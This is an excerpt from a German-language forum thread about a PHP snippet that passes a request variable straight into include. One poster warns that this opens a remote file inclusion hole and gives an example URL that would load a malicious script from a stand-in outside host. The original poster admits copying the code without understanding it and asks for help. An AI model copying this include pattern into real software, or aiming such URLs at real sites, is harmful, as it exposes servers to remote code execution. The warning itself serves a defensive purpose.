Hallo Leon,

$variable="$p";
<?php include ("$p.htm") ; ?>
du weißt, dass du dir damit ein scheunentorgroßes Sicherheitsloch einfängst? Da muss nur jemand daherkommen und die Seite mit index.php?http://www.example.com/boesesscript aufrufen - an deiner Stelle würde ich die Datei _sofort_ vom Server löschen.

ähm... nein, wusste ich nicht. Ich kenne mich mit PHP leider kaum aus, habe den code von einer anderen Seite genommen.

Wo liegt das problem daran?
Überhaupt mit include zu arbeiten?

hmm, was soll ich tun?